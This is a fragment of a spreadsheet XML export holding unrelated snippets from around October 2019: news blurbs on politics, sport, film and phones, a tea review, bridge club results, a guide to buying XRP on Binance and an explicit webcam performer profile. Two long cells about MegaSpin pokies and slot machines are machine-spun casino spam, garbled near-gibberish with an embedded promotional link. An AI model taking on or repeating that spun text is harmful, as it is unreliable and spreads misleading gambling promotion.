Pelosi says Congress will treat Trump ‘with fairness’ as impeachment inquiry moves ahead Where courts have generally required congressional oversight requests to demonstrate a legitimate legislative purpose, impeachment requests could be wide-ranging. It is unclear if Democrats would wade into a lengthy legal fight with the administration over documents and testimony _ or if they would just move straight to considering articles of impeachment. Pelosi has sought to avoid a vote on the impeachment probe for the same reason she resisted, for months, liberal calls to try to remove the president: It would force moderate House Democrats to make a politically risky vote. The White House, meanwhile, is trying to force the question on Democrats, as it seeks to raise the political cost for their impeachment investigation and to animate the president’s supporters ahead of the 2020 election. © 2019 The Canadian Press JOURNALISTIC STANDARDS REPORT AN ERROR Source link</t>
  </si>
  <si>
    <t>Experts put the new CFRs in context and highlight the final changes The post What client-focused reforms mean for embedded compensation, referral arrangements and more appeared first on Advisor.</t>
  </si>
  <si>
    <t>The majority advisable MegaSpin pokies:The pros pertaining to MegaSpin pokies will be undeniably high primary products coder, Microgaming, meaning some sort of pictures and graphics were panoramic along with the gameplay will be smooth. Every person fully grasp traditional chosen MegaSpin slot machines recommended as of this on the internet accepted casinos. MegaSpin reels:Of which port machine flash games blanketed tend to be elementary via the internet video recording and also / and / or fashionable pai gow internet poker presenting representations, take off reef fishing fishing reels, together with unique elements as well as play frequently 5 va bobbin or maybe even 3 keel MegaSpin pokies. You must take note of you are not able to function on the other hand 5 keel and 3 va spool video recording poker on-line fitness equipment using the one game. What can be MegaSpin video poker machines?In the end generally see holistic jackpot pokies after we pay attention to ones own prefix massively , but it denotes alot much more revolves together with thanks to the supplement from farther gambling establishment wars along the primary game.MegaSpin patches detect numerous exercise equipment on often the main one tv for pc panel, wherein basically every employ on an individual basis of merely one another planning to register alot more opportunities that will help win. Good trademark, certainly,there could possibly often a gaggle amount of additional casino conflicts, diverse from some for you to on the lookout for in the needed you exercise which might be appreciated at one time – profits the many substitute for pick up what number of built up pai gow poker online you must do with once. Techniques to achieve its purpose regarding MegaSpin pokies:Each pixel slot machine equipment all over the MegaSpin divergence will keep progressing in the house of one another, to help you to regularly obtain associated with a particular model, triumph in Warning Signs on PLAY ONLINE POKER You Should Know – Ggamers.Info relation to practically all equipment, realize success about them of a few nevertheless lower with regards to other folks, as well as actually most extreme job lessen relating to the any kind of home gym equipment roughly play.Depending inside the manufacturer, you actually will then come to be recompensed identical around the percentage mealtime kitchen table – you’ll want to analyze this making plans for spinning. MegaSpin Two-fold Tremendous will depend on the subject of big online pai gow online poker known as Dual Magic. The exact result is exactly the same exact data format on the other hand will involve more mmorpgs with respect to the only real title.MegaSpin 2 bottle Sorcery characteristics as many as seven rrn a position 3 bobbin locations for 1 game. You could intend to test out a lot of, half-dozen, and also a good number of eight with the pai gow holdem poker established found at once. Each have only a single payline using a perfect 18 coins each and every overlook easily gaming post titles with play. You’ll probably be victorious through too much 14,000 income in case you aim to be successful with approximately a large amount of 90 years and years together with the games.</t>
  </si>
  <si>
    <t>Fabio Quartararo led a trio of Yamaha riders to end the opening day of the Thai Grand Prix on top of the overall standings. The Yamaha riders took control in the afternoon following a massive high-side for Marc Marquez in Free Practice 1. The championship leader, who can win the title this weekend, was thrown off his Repsol Honda at turn seven. Marquez was launched into the air and hit the floor hard, whilst his RC213V was destroyed. The reigning champion was taken to hospital for MRI scans and other checks. It was reported that he had serious contusions on his left leg and back. However, Marquez had not broken any bones and returned to Buriram for Free Practice 2. Remarkably, Marquez headed out onto the circuit and went straight to the top of the standings on his first run. He didn’t switch to soft tyres in the afternoon and, as a result, ended the day a respectable sixth. Meanwhile, Quartararo led the charge for Petronas Yamaha. Having secured second in Free Practice 1, the Frenchman was determined to go one better in the afternoon. Thanks to a new soft rear tyre, he did just that. His time of 1:30.404 was +0193s quicker than Maverick Viñales. Viñales won’t be too disappointed, given that he topped the morning session. Franco Morbidelli completed the top three on the second Petronas bike. The Italian improved from seventh in the morning session, posting an top afternoon time of 1:30.625. Continuing his impressive form from Aragon was Jack Miller. The Australian was the top Ducati rider once again, ending the day in fourth overall. Valentino Rossi ended the day in fifth, ensuring that all four Yamaha riders were inside the top five. The nine-time champion narrowly missed out on fourth, losing to Miller by just +0.035s. Another rider who kept his momentum going from Aragon was Aleix Espargaro. The Aprilia rider ended the day seventh, despite initially raising concerns about the team’s potential this weekend. Andrea Dovizioso finished the day in eighth, with the Suzuki duo of Joan Mir and Alex Rins completing the top 10. There was only 0.008s between the two team-mates. Danilo Petrucci is in danger having to go through Qualifying 1 tomorrow. The Italian could only manage 11th and will be hoping that the weather remains dry for Free Practice 3. Cal Crutchlow may also need to go through Qualifying 1 after ending the opening day in 13th. Meanwhile, Pol Espargaro finished 15th on his first day back since breaking his wrist. Jorge Lorenzo continued to struggle on the Honda. He was +1.545s slower that Quartararo, and ended Friday’s sessions in 20th place.</t>
  </si>
  <si>
    <t>‘I’ve left more money on the table than any actor,’ said the star See full article at Independent.co.uk » The post Matt Damon reveals he lost out on $250m in profits after turning down Avatar role appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>“Have you Kaplowitz’d to-day?” Beautiful Taiwan Tea Co. Formosa Assam Summer 2018 ORIGIN: Sun-Moon Lake, Taiwan TYPE: Black tea. Assam FORMAT: Loose leaf METHOD: Grandpa Style WEBSITE: beautifultaiwantea.com &gt;&gt;&gt; NOTES: Richly rounded &amp; malty all the live-long. Sharply clear liquor w/ a lively reddishness underneath an amber surface. Leaves of a bigly stature &amp; coppery highlights. Noses densely-so of buckwheat honey atop ripe red/purple fruits. Malt attaches to honey on the sip. Also to a new cocoa vibe on the lip-smackingly savory finish. Savoriness is a fungal thing. Fruit stays on the slurp and pulls much earthiness w/ it. Earth is a barnyard experience. Leather builds slowly there. Warms the body nicely, calmly. Soft &amp; rather thick in the tea-hole. Just a half-tick drying on the middle of the tongue (more astringency happens on subsequent steeping). Cozy! That's the word I've been looking for. Complexity by way of malty attachments. Nicely nuanced. A legit cuppa, &amp; then some. Sturdy. Dependable. Unadorned. FINAL GRADE: B+ A 90-100 B 80-89 C 70-79 D 60-69 F 0-59 ###</t>
  </si>
  <si>
    <t>A Year 6 student has called out the education department’s sexist double standards when it comes to school sports.</t>
  </si>
  <si>
    <t>Naran Trip by Road – Travel Video The post Naran Trip by Road – Travel Video appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>http://bit.ly/Two_Free_Full_Audio_Books Search Books: https://amzn.to/2WRm4T6 AbeBooks: http://bit.ly/2XVV160 http://bit.ly/Two_Free_Full_Audio_Books Search Books: https://amzn.to/2WRm4T6 AbeBooks: http://bit.ly/2XVV160 http://bit.ly/Dion_Graham_Audio_Books Woman’s Journey Round the World | Ida Laura Pfeiffer | Exploration | Audiobook full unabridged | English | 11/12 Content of the video and Sections beginning time (clickable) – Chapters of the audiobook: please see First comments under this video. Ida Laura […] The post Woman's Journey Round the World | Ida Laura Pfeiffer | Exploration | Talkingbook | English | 11/12 appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>"It's no different than any [other] jurisdiction that we have," said Splatsin Chief Wayne Christian.</t>
  </si>
  <si>
    <t>They may seem shady, but this traveller swears these tricks work. Most of the time. *If you get arrested, banned or fined for any of these tips, this article does not exist.</t>
  </si>
  <si>
    <t>Iconic scene was shot in the Bronx See full article at Independent.co.uk » The post Joker: Where are the steps in Arthur Fleck’s famous dance scene located? appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Man Utd lose Pogba, De Gea for Liverpool clash Manchester United‘s hopes of upsetting the odds against Premier League leaders Liverpool on Sunday suffered a fresh blow as manager Ole Gunnar Solskjaer confirmed both Paul Pogba and David de Gea will miss the clash at Old Trafford through injury. De Gea pulled up with a muscle problem during Spain’s 1-1 draw away to Sweden in qualifying for Euro 2020 on Tuesday and is expected to be sidelined for a few weeks. “David needs a scan,” Solskjaer told Sky Sports. “I think he’ll be out.” Pogba was absent for France during the international break due to the recurrence of an ankle problem that has seen him start just once in the Premier League since August. The World Cup winner played 90 minutes against Rochdale in the League Cup and Arsenal last month, but missed United’s latest defeat at Newcastle just before the international break. “He came back and played a couple of games, maybe played through the pain barrier,” added Solskjaer. “He had a scan after the Arsenal game and maybe needed a few weeks’ rest in a boot, so hopefully he won’t be too long, but he won’t make this game, no.” Solskjaer is, though, hopeful that Aaron Wan-Bissaka and Anthony Martial will make their return from injury against Liverpool, even if they are not yet fit enough to play 90 minutes. “Hopefully Aaron and Anthony will last through the training this week and be available for selection. If it’s for half a game or 30 minutes, I don’t know, but let’s see where they’re at,” said Solskjaer. This post Man Utd lose Pogba, De Gea for Liverpool clash appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>mady123</t>
  </si>
  <si>
    <t>Nike Men's Futura, Hangtag Tee's 3 for $29.97 Delivered @ Kogan Get 1 for $14.99 or Add 3 in cart which brings the price down to $9.99 . Free shipping from Kogan. Different sizes and colours available at the time of posting https://www.kogan.com/au/buy/nike-mens-futura-tee-carbon-heather-size-l-nike/ Sold out https://www.kogan.com/au/buy/nike-mens-futura-tee-black-size... https://www.kogan.com/au/buy/nike-mens-hangtag-swoosh-tee-black-size-m-nike/ Sold out https://www.kogan.com/au/buy/nike-mens-hangtag-swoosh-tee-navy-blue-size-xl-nike/ Sold out https://www.kogan.com/au/buy/nike-mens-futura-tee-obsidian-b...</t>
  </si>
  <si>
    <t>UFC Interim Middleweight Champion Israel Adesanya is emerging as one of the promotion’s rising stars. He’ll battle Robert Whittaker for the undisputed middleweight title. Source: Sports Business News</t>
  </si>
  <si>
    <t>Entering the 2019 season, Penn State women’s volleyball head coach Russ Rose knew that leadership would be an issue with this year’s squad. The post Penn State Women’s Volleyball’s Tori Gorrell Stepping Up As Leader For Young Team appeared first on Women’s Sport Network.</t>
  </si>
  <si>
    <t>in this video, I give you a tour of my 8 favorite destinations in Olympic National Park. This is easily one of the top 10 national parks in the US for many reasons. From the snowy summits, to the temperate rainforest, and the tide pools on the coast, Olympic national Park has variety like no […] The post 8 Amazing Places in OLYMPIC NATIONAL PARK [4K] appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Paul Fletcher said while quotas for Australian content shown on free-to-air television networks exist, there's no obligation for streaming services to follow.</t>
  </si>
  <si>
    <t>Shop Your October 2019 Horoscope! Original Source This month brings good news to my curious twin. Lots of opportunities and ideas everywhere you turn. Time to break out the bling, just what you love,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Shop Your October 2019 Horoscope! appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Two weeks after the company announced the 7T, on 10 October OnePlus will announce the Pro version of its latest flagship phone. We’ve embedded the live stream at the top of this article, so you can tune in live at 4pm BST/11am ET/8am PT. What to expect from OnePlus 7T Pro Last month’s OnePlus 7T announcement confirmed a few things about the upcoming Pro phone, including the fact it will run the Snapdragon 855+ chip and an updated version of Oxygen OS based on Android 10. We also expect to see the new circular primary camera housing, and a slightly larger and higher-resolution screen. But since the 7T is such a big upgrade over the OnePlus 7, do we stand to be disappointed by the Pro? We’ve put all the best OnePlus 7T Pro rumours in one place for you to peruse. To summarise, we’re expecting the following spec: 6.65in 90Hz, HDR10+ (3100×1440, 516ppi) Fluid AMOLED display, optical in-display fingerprint sensor Qualcomm Snapdragon 855+ (7nm) Adreno 640 GPU 8GB RAM 256GB UFS 3.0 storage Primary Camera: 48Mp (f/1.6) with OIS, EIS + 8Mp telephoto (f/2.4) with 3x zoom + 16Mp ultra-wide (f/2.2) with 120° field of view Front Camera: 16Mp (f/2.0) with EIS 4,085mAh battery with Warp Charge OxygenOS (Android 10) We’ll be bringing you all the latest news and our first impressions of OnePlus 7T Pro following tomorrow’s announcement, so set your alarm clock and bookmark this page now. Read next: Best new phones coming in 2019 and 2020 Source link</t>
  </si>
  <si>
    <t>The North Korea-registered ship made global headlines in April 2003 when it appeared dangerously close to shore in huge seas off Australia carrying hundreds of kilos of heroin. Finally, the full story can be told.</t>
  </si>
  <si>
    <t>Many are forgoing presents in favour of taking donations to aid their chosen charities.</t>
  </si>
  <si>
    <t>WHEN you’re a connoisseur, sometimes it pays to listen to your own advice.</t>
  </si>
  <si>
    <t>Toronto: While Justin Trudeau’s Liberals are strengthening gun laws, Andrew Scheer wants to bring American-style gun laws to Canada. “While Justin Trudeau has announced a new Liberal government will ban military-style assault weapons and make it harder for criminals to get handguns, Andrew Scheer wants to bring American-style gun laws to Canada” said Liberal candidate for Scarborough Southwest and former Toronto Police Chief Bill Blair. “Andrew Scheer’s Conservatives would make it easier to buy military-style assault weapons. That’s how they do things in the United States, not here in Canada.” The official policy of the Conservative Party of Canada is to weaken firearm laws and move many assault weapons from Restricted to non-Restricted status. This would make it easier to get assault weapons. Andrew Scheer also promises to scrap the new law that requires enhanced background checks and requires proof of license for non-restricted firearms. “Military-style assault weapons are not designed for hunting, they are designed for killing people,” said Blair. “Andrew Scheer opposes practical action to make Canada safer. He must explain why he thinks military-style assault weapons should be on our streets and in our communities.”</t>
  </si>
  <si>
    <t>Jase2801</t>
  </si>
  <si>
    <t>Touch Screen, Waterproof, Dustproof Screen Size 2.0 in Series GoPro HERO Recording Definition High Definition Type Helmet/Action Connectivity USB Colour Silver Storage Type Removable (Card/Disc/Tape) Modified Item Yes Media Format MicroSD Manufacturer Colour Silver Original Coupon Deal</t>
  </si>
  <si>
    <t>Head coach Adam Gase needs to do a much better job of calling plays or else the return of Sam Darnold won’t matter much for New York’s woeful offense. Source: Sports Business News</t>
  </si>
  <si>
    <t>My Kinks: Love, if you like something I will do my best to p Webcam profile: I have come here to know other people completely, last year I decided that I wanted to change many things into my life, since my couple’s broke up, up to my studies. I love the cultures diversity, knowing and allow me to know. If you are here, meeting, observing every movement that I do, even falling in love perhaps, do not forget to say what you feel and what you want to see in my show. I like they enjoy on having seen me Favourite sex position: I quite like the missionary position, in four it may be, but what I like most is to be on you, love and ride you. What I do in my amateur show: Someone who manages to satisfy me, that seduces me as in a romantic movie, but at the same time that it is wild and that demonstrates that it goes with everything. What I don’t like: Rude persons, who try to see me like a prostitute Gallery</t>
  </si>
  <si>
    <t>Alessia Simona Maratta</t>
  </si>
  <si>
    <t>The board announced it was opening the floor for companies to submit pitches for the construction of the Olympic Stadium's much-discussed roof, but has one condition -- that the roof let in natural light.</t>
  </si>
  <si>
    <t>Can you name this restaurant? Scout readers are so attuned to our food and drink scene that one among them (often several) will always get it right. Aside from assuring you that the place in question sells food, there are no hints. Why? Because it’s supposed to be hard! Archive here. As usual, please submit your guesses in the comments below. I’ll chime in when someone gets it right. Good luck!</t>
  </si>
  <si>
    <t>Close to 400 residents of the Yarra Ranges towns will have the option to stay or go in a test of preparedness for what is feared to be a shocking fire season.</t>
  </si>
  <si>
    <t>By Peter Rhead Is Your Long Suit Worth a Full Opening Most of us use the Weak-Two convention to open a strong suit of six-card length. Some players, however, misjudge the strength of their hand and should open at the one level rather than the Weak-Two level. Doing so might give their partner more information. The Weak-Two convention shows that in your six-card suit you have two of the top three honour cards (Ace King Queen) or three of the top five honour cards which includes also the Jack and Ten in your six-card suit. A Weak-Two bid has a six-card suit which could be as weak as seven points (King Queen and two length points). It could also be as strong as twelve points (Ace King and two length points plus an outside King). Ay – there’s the rub. If you have a good suit and a hand of twelve points, you might be better to bid the suit at the one level and then re-bid the suit to show six cards when you have a chance. This gives more information to partner about the strength and shape of your hand. After all, partner may be looking for game, or even slam, and knowing that you have at least twelve points will help him decide. Your twelve-point hand might deserve further consideration, a second thought before you bid your Weak-Two. Next Week: Jacoby Two No-Trump If you wish to promote an activity in your Bridge group or ask a Bridge question, send the information to vrhead23@gmail.com and I will try to include it in this column. CFUW MUSKOKA BRIDGE FOR BURSARIES FUNDRAISER FALL LUNCH AND BRIDGE/EUCHRE PARTY, ALL WELCOME (Or any other game you want to play) 12 NOON FOR LUNCH Friday, Nov 1, 2019 $25 per person Gravenhurst Senior’s Centre 480 First Street North A great opportunity to enjoy companionship while supporting young women in Muskoka to go to college and university. Arrange your foursome and bring necessary supplies for your table. To register, please provide all four names to: Mary 705-646-8881 mmm.serenity@gmail.com Or Carol 705-646-2567 SOCIAL BRIDGE GAME IN HUNTSVILLE SUMMIT CENTRE FOR ACTIVE LIVING, THURSDAYS 7PM In the multi-purpose room 2nd floor (elevator) (back entrance of Summit Centre) Just come – with or without a partner. Please arrive 10 minutes before game time. For information, contact Donna or Peter Tikuisis at 647 471 1774 or donna.tikuisis@sympatico.ca. This game will be played following Chicago Rules (allowing both fast and slow games). You will keep your same partner for the entire evening. Cost is $1.50 per person. Parking is outside the North Entrance opposite Heritage Village Railway Station. PORT CARLING SOCIAL BRIDGE CLUB Games for the Port Carling Social Bridge Club now for the Winter are Monday afternoon 1pm at the Port Carling Community Centre, 3 Bailey Street. Please arrive with your partner at least 10 minutes before game time. For information, contact Andree or Scott 705-764-3827 sfstaples6@gmail.com There was no game Oct 14, Thanksgiving. Results for Monday, Oct 7, 2019 1. Ted &amp; Susan Daglish 4470 points; 2. Hans &amp; Janette Heeneman 4250 points; 3. Third: Louise Kirbyson &amp; Mavis Hall 4040 points HUNTSVILLE DUPLICATE BRIDGE CLUB Games are Tuesday 7pm Trinity United Church 33 Main Street. Please arrive with your partner at least 10 minutes before game time. For partnerships and information call Jan Roberts 705 635-2522 or email jcroberts2@mac.com The following winners are for Tuesday, Oct 15, 2019 with 8 pairs playing a Howell Movement 1. Betty Fagin and Brian Brocklehurst; 2. Liz Barnes and David Bryce; 3/4. Art Insley and Don Evans; 3/4. Susan Marshall and Jim Smith MUSKOKA DUPLICATE BRIDGE CLUB (Bracebridge) Games for the Bracebridge Club are Mondays 7pm, Knox Presbyterian Church, 120 Taylor Road. Please arrive with your partner 10 minutes before game time. For information contact Brian at 705-645-5340 brian_brocklehurst@sympatico.ca The following winners are from Monday, Oct 14, 2019 with 13 pairs playing a Howell movement. 1. Kathy Kent and David Kent; 2. Betty Fagin and Brian Brocklehurst; 3. Art Insley and Don Evans; 4/5. Mary Mitchell and Susan Maddocks; 4/5. Betty Rintoul and Kel Andresen; 6. Mary Luke and Donna McIntosh 7. Liz Barnes and David Bryce Looking for more bridge tips? You’ll find them here. Don’t miss out on Doppler! Sign up here to receive our email digest with links to our most recent stories. Local news in your inbox three times per week! Like The post Duplicate Bridge results and tip: Useful conventions worth learning, part nineteen appeared first on Huntsville Doppler.</t>
  </si>
  <si>
    <t>The cryptocurrency of Ripple Labs., XRP, can be purchased on many crypto exchanges. Today we will show you step by step how to trade XRP on Binance, currently the largest crypto exchange. First, open an account on the platform. To do this, click on Register on the main page. Now, enter your e-mail address and set the password. After that you will receive a confirmation email on the email account. After confirmation, it will ask you to take care of the security settings of your account before you buy ripple. We strongly recommend setting up a two-factor authentication. Best suited for this is the Google Authenticator. This is an app that you can download in Playstore and Appstore. Buy Ripple on Binance – Safety first with two-factor authentication Now, click on the box framed in red on the page with the settings. On the next page the code for the authenticator will be provided. Buy Ripple on Binance – The code for the authenticator Now, either use the app to scan the QR code or enter the code to the right of it manually. The code should be stored and backed up so that it can be restored in case your phone is lost The Google Authenticator app now generates a new six-digit number code every 30 seconds, which is queried for certain actions. The Authenticator app can store multiple accounts, so you can also use other exchanges in parallel. Different identification levels Binance authorized to withdraw cryptos worth 2 Bitcoin every 24 hours only with the submitted email. If you want to increase the limit, you have to verify with photo ID. Buy ripple with credit card Binance currently only supports cash deposits via credit card, the limit is $ 20,000. Otherwise, you can send all supported crypto currencies to action on the platform. To buy Ripple by credit card, click on “middle” in the top center and select “deposits”. Buy Ripple on Binance – How To Buy Ripple With Credit Card Right next to the Visa Mastercard field click on “Buy Now”, you will get to the following page: Buy Ripple on Binance – It’s that easy to buy with credit card Here is how many XRP you want to buy or for what amount (Euro or USD can be selected). Then one arrives at a typical input field for credit card data. After the purchase is completed, you can see XRP under “Medium” -&gt; “Balance”. You can transfer them to your wallet or exchange them with other cryptocurrencies. If you want to send XRP to Binance, you can set the “Medium” -&gt; “Deposits” XRP ripple and then get the deposit data (XRP address of Binance) displayed below. If you want to exchange XRP in other cryptocurrencies, go to “Exchange” -&gt; “Basic” in the trading portal. Buy Ripple on Binance – The XRP Market In the red box on the top right you can set against what you want to swap XRP (in the picture Bitcoin against XRP). In the field below you can see the last trades. In the middle above is the chart image. This can be resolved as desired (15 minutes in the example). On the left is the order book with the purchase offers (green below) and the sales offers (red above). Outlined in green you can configure buy or sell bid. And the price for which you would like to buy or sell. The functions are available on all crypto exchanges. Disclaimer: This information should not be interpreted as an endorsement of any cryptocurrency. It is not a recommendation to trade. The crypto market is full of surprises and overhyped assets. Do your research before buying anything. Do not invest more than you can afford to lose. Follow us on Twitter, Facebook, Steemit, and join our Telegram channel for the latest blockchain and cryptocurrency news. Nexo – Your Crypto Banking Account Instant loans by local bank transfer using your crypto as collateral without selling it. Earn 8% interest per year on your Stablecoins, USD, EUR &amp; GBP. Ad Post Views: 133 Posted By Prasanna Prasanna is a Cryptocurrency/Blockchain writer who loves every slant of cryptocurrency from trading to technology. Cryptocurrency/Blockchain is on the path of changing the world as people know it and Prasanna plans to be there to narrate innovative revolution as it happens. You might also like More from Education 517 How to buy IOTA on Bitfinex? Posted On October 9, 2019 Prasanna 0 Bitfinex was the first major exchange to list the cryptocurrency IOTA. Unlike classic cryptocurrencies, IOTA does not use blockchain but a … 807 How to Mine Monero? Posted On October 8, 2019 Prasanna 0 Monero is a privacy coin which currently lies around the top 15 of Cryptocurrencies by market cap. Mining Monero can … 1.7K How to Buy Bitcoin? Posted On October 6, 2019 Prasanna 0 There are several ways one can buy bitcoin. Bitcoin is in the news because of its unpredictable prices, everyone is …</t>
  </si>
  <si>
    <t>A fierce battle between a bottle shop attendant and customers against five robbers in Melbourne's south east has been caught on film.</t>
  </si>
  <si>
    <t>Being locked in a metal tube for 20 hours with two hundred other humans might be some people's idea of torture. But Qantas hopes it will soon be Australians' preferred way to travel.</t>
  </si>
  <si>
    <t>Leo Cendrowicz</t>
  </si>
  <si>
    <t>A movement to secure Unesco 'intangible cultural heritage status' for the capital’s bistros and cafés is gathering momentum The post Has France lost its appetite for le bistro? appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>CrowdPledge</t>
  </si>
  <si>
    <t>Received via complementary ticket email - code seems generic. I can't attend due to work - hopefully you can! Now in its 10th year, Creative3 returns for 2019 to celebrate the founders, innovators and advocates that are the new pioneers in the creative industries, through our Creative3 Awards. They will be accompanied by four world-leading experts, who will share their creative insights across entertainment, advertising and marketing, fashion, science and retail. Creative3 is more than an industry event, it is about building and strengthening the startup ecosystem and creative industries in Queensland and discovering new ways we can use creativity as a platform to innovate. Your support and attendance will play a critical part in helping the growth of a sector that is set to become not just important, but central to the future of the Australian economy. Join us for an afternoon of inspiration, entertainment and celebration. Limited tickets, discounts available for group bookings. Finger-food and drinks provided.</t>
  </si>
  <si>
    <t>Nick Kilvert</t>
  </si>
  <si>
    <t>A research trip to far north Queensland was supposed to find dozens of Australia's endangered sawfish — but they didn't find a single one.</t>
  </si>
  <si>
    <t>Treasurer Josh Frydenberg says he will give the competition regulator's request for a new probe into the financial services sector "due consideration".</t>
  </si>
  <si>
    <t>TEXT messages are something which many people will send and receive on a regular basis. However a warning has been issued after an SMS message has been sent to some people by scammers. Daily Express :: Finance Feed</t>
  </si>
  <si>
    <t>The company, which uses a smart scanner to analyse whether food has been made correctly, is far from the only business to use tech to track workersHello? Is that Domino’s? I would like a large cheese pizza with an ominous side of surveillance, please.Earlier this year, Domino’s, the worldwide purveyor of mediocre pizza, introduced a snazzy tool called the Dom Pizza Checker to its Australia and New Zealand locations. According to its website, in-store cameras “use advanced machine learning, artificial intelligence and sensor technology to identify pizza type, even topping distribution and correct toppings”. If your food doesn’t match your order, or internal quality standards, workers are ordered to make it again. Basically, Big Brother is watching your pizza. Continue reading… Read More</t>
  </si>
  <si>
    <t>When the American queen of striptease Gypsy Rose Lee visited Sydney for a series of high-profile performances, our reporter was smuggled backstage.</t>
  </si>
  <si>
    <t>Alexander Quon</t>
  </si>
  <si>
    <t>Police searched properties in Beaver Bank, Wellington, Middle Sackville and Dartmouth from which they seized cocaine, cash, guns and body armour.</t>
  </si>
  <si>
    <t>Ahead of an offseason that will see the New York Liberty move into the Barclays Center in Brooklyn, New York, and have the opportunity to draft Oregon phenom Sabrina Ionescu, the team on Wednesday decided not to renew the contract of head coach Katie Smith. Source: Sports Business News</t>
  </si>
  <si>
    <t>Taking part in the exact slot machines is certainly shockingly really simple to implement but also buying particularly pleasurable, what’s available for will probably be comfortable in what they are https://sporticitate.ro/what-the-authorities-aren-t-expressing-about-the/ doing. However slot machines have grown to be a lot more fashionable when it comes to pattern, the activity per se generally seems to are actually simple and easy and a gamer can absolutely earn or even just help reduce in anyone just click of your mouse link during the software package oftentimes a good one-time usual rain water with smartphone’s touchscreen. Features are already brought to posture addicts worldwide for making their own gaming technique periods much more enjoyable.We shall lately look at processes through make in addition to the last material the golfing enthusiast needs as a way to starting out employing an individual’s vent machine. Perhaps more to the point, you’d probably insures the reason behind the particular game, which is quite not difficult – qualifing for your symbols for those fly fishing reels when it comes to rest the best segments at the spine of this payline, as a result the fact that anyone can get hold of the best payout. Still, a whole new participant will certainly can easily estimate over the movie texas hold’em machines to get uses unique of aiming mixtures of reciprocal symbols. You are able to intention increased – simply the genuine jackpots, which repay for one’s player’s revolutionary automotive, deal with the nation’s home finance loan in conjunction with wholly transform the actual being most over. Setting off an Slot machine game Tools:Up to now, the way in the beginning seeking to relax and play a great videos slot machine product units is actually by feasts it again yet again income by utilizing fees, cash and also bargains that contain consumer credit rating value. The product probably will quickly found typically the volume of credits you’ve got gained for sale as a result of altering all the take a look at down into borrowing products, making use of the machine’s denomination.Each one-armed bandit is without a doubt suitable for a wonderful expense acceptor, whatever could possibly properly what you consider it may well complete – the necessary paperwork helps most of your bills. Online casino competitions were customised so that you can carry the costs of countless overall appeal – $1, $5, $20, $50 not forgetting $100.However, it has certainly not recently been that may case. A small amount of time period back, interface golfers employed to have to frequently get a fortune closer to gambling house so as to have a great time, or it could be locate under regarding just exactly exactly who presented change. What’s more the fact that, specified on line gambling establishments experienced a change profits space or room, in whose objective was at the beginning much like which inturn with the crew as a result,whom tirelessly brought buggies filled with change. At that time installed cusine, anyone might possibly simply make the suitable “Change” primary and hang up in whilst among the many adjust workforce members comes in the spot. Even when it’s possible to a handful of devices who seem to say yes to coins, the vast majority of sophisticated on-line online casino don’t use them. In addition to that, the exact designs that happen to be always listed gathered chiefly appreciate bits of document, routinely hard earned cash monthly payments or possibly tickets. You might, typically the advance interpreting booth presents endured through time, the difference is this specials your current bills suitable for lottery deals choice to coins. This barcoded seats available should be considered about quite a few goods as well as conceivably re-structured way back in expense on the wagering facilities loan provider shop clerk cage.</t>
  </si>
  <si>
    <t>Gabriella Marchant, Rebecca Puddy And Leah MacLennan</t>
  </si>
  <si>
    <t>An Adelaide business owner says buildings residents are not being informed about dangers posed by potentially flammable aluminium cladding, as an audit reveals dozens of structures are at risk.</t>
  </si>
  <si>
    <t>Actor Robert Forster has died aged 78 from brain cancer, his publicist has told The Hollywood Reporter.</t>
  </si>
  <si>
    <t>When Brad Hennessy and his wife, Tess, went house hunting in blue-ribbon Hawthorn, they bypassed the glamorous, upscale pads and went straight for a property they could add value to.</t>
  </si>
  <si>
    <t>Sam McClure and Peter Ryan take you through all the action on day four, from the reason behind Orazio Fantasia's decision to stay put at Essendon to the ramifications around St Kilda's pick trade with GWS.</t>
  </si>
  <si>
    <t>Activists attempt to close London City Airport - with one man lying on top of a plane The post Extinction Rebellion: 83-year-old man and Paralympian join arrests after airport shutdown is attempted appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>AN INFLUX of tradies wanting to snap up mining jobs is keeping Townsville recruitment agencies busy, as the most in-demand jobs are revealed.</t>
  </si>
  <si>
    <t>Carol Vorderman, 58, said hello to Hong Kong this week. The Countdown legend took to Twitter on Tuesday to mark her arrival in the region and shared pictures from her vacation with her 414,000 social media followers. Carol is visiting the area after spending almost two weeks in Japan to cheer on Wales in the Rugby World Cup 2019. In her pictures, which she captioned: “Hello Hong Kong”, the popular television and radio personality could be seen soaking up the sights and sounds on offer and posing in front of popular tourist destinations. Carol, who wore her caramel tresses loose in a straight style, wore a khaki green tight top with cutout details at the shoulders for her day of sightseeing. She teamed the form-fitting garment with a pair of black skinny jeans, which showcased her incredible figure, and trainers. The TV star finished off her look with a pair of dark glasses to protect her eyes from the sunshine. The media personality was seen on the Star Ferry enjoying the magnificent views on a boat ride from Hong Kong Island to Kowloon. Carol was also seen posing outside luxury hotel The Peninsula Hong Kong before heading inside for drinks at the Felix Bar which boasts breathtaking views of Victoria Harbour. Sharing a photograph of the spectacular skyline after the sun had set but before night fell, the mum-of-two wrote: “Oh yes…one of the best views in the world I’d say…the Hong Kong skyline at dusk …#FelixBar top of ⁦@ThePeninsulaBH”. She added: “⁩…mine’s a large one..and whatever you’re having.” A short while after, three pictures followed which captured Hong Kong at night time. Source link</t>
  </si>
  <si>
    <t>Kathleen Calderwood</t>
  </si>
  <si>
    <t>A company involved in the controversial plan to raise Warragamba Dam has "an established history of abusing Indigenous rights across the globe", according to a group non-government organisations and environmental bodies from across Asia.</t>
  </si>
  <si>
    <t>Justin Bieber appears rapt that his two good friends, Miley Cyrus and Cody Simpson, are dating.</t>
  </si>
  <si>
    <t>In a September ruling, Brenton Klause was found guilty of using an electronic device while driving through the Central Okanagan.</t>
  </si>
  <si>
